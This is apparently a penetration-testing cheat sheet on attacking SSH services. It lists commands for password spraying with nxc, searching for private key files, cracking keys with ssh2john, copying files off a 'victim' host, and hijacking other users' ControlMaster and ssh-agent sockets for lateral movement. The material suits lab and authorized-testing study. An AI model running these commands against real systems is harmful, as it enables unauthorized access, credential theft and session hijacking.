SSH 22
SSH or Secure Shell or Secure Socket Shell, is a network protocol that gives users a secure way to access a computer over an unsecured network.
22/tcp open ssh syn-ack
- Authentication
User/pass auth:
ssh user@IP
nxc ssh 192.168.1.0/24 -u user -p password
nxc http 192.168.1.0/24 --port 2222
nxc ssh 127.0.0.1 -u user -p password -x whoami
RSA Key auth:
ssh -i user@IP
- Download files
Once we have credentials or our public key is in the victim machine and we can connect through ssh, we can send a file from our machine to the victim machine with the following command:
scp {file} user@IP:/{directory}
To do the opposite and download a file from the victim machine to our machine:
scp linuxvictim@linuxvictim:svuser.key ./
- SSH Lateral Movement
To find keys on Linux:
find /home/ -name "id_rsa"
find /home/ *.key
To find keys on Windows:
dir C:\Users\ /s /b id_rsa
dir C:\Users\ /s /b *.key
To know if a key is passphrase-encrypted SSH key, check first few lines:
To convert a SSH key to a JTR-compatible format in order to crack it, we can use ssh2john.
To discover new hosts:
cat /.ssh/know_hosts or see Enviroment variables to locate hosts and used keys. The first command will not be usefull if HashKnownHosts setting enabled in /etc/ssh/ssh_config.
If we notice that the user ssh's to a machine named "controller", then to determine it's IP Address: host controller
To ssh with a found key to a domain user named vulnuser in a domain named example.com (double backslash):
proxychains ssh -i vulnuser_id_rsa example\\vulnuser@{IP}
- SSH Persistance in "SSH Backdoor" section under Linux Post-Exploitation
- SSH Hijacking with ControlMaster
ControlMaster is a feature that enables sharing of multiple SSH sessions over a single network connection. This functionality can be enabled for a given user by editing their local SSH configuration file (~/.ssh/config).
ls -al ~/.ssh/controlmaster/
If we see the folder but no socket file, run pspy and see if someone logs in, if so, then wait for the socket to appear and ssh into the victim, to monitor it:
watch -n 1 ls -al ~/.ssh/controlmaster/
At this point, as an attacker, if we simply SSH to the server listed in the victim’s socket file, we will not be prompted for a password and are given direct access to the linuxvictim machine via SSH.
If we are root we can hijack an open SSH socket:
ls -al /home/user/.ssh/controlmaster
ssh -S /home/user/.ssh/controlmaster/user\@linuxvictim\:22 user@linuxvictim
- SSH Hijacking Using SSH-Agent and SSH Agent Forwarding
SSH-Agent is a utility that keeps track of a user’s private keys and allows them to be used without having to repeat their passphrases on every connection.
SSH agent forwarding is a mechanism that allows a user to use the SSH-Agent on an intermediate server as if it were their own local agent on their originating machine. This is useful in situations where a user might need to ssh from an intermediate host into another network segment, which can’t be directly accessed from the originating machine. It has the advantage of not requiring the private key to be stored on the intermediate server and the user does not need to enter their passphrase more than once.
We can check if they are enabled here: ~/.ssh/config
First scenario: we have compromised the account of a user who is logged in to the intermediate server, so we can ssh to the victim machine.
Second scenario: we have compromised and have root privileges on the controller:
pstree -p user | grep ssh
cat /proc/16381/environ
Now we can use the victim’s SSH agent socket file as if it were our own:
SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh-add -l
SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh user@linuxvictim
- Password Spraying
nxc ssh 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
Last updated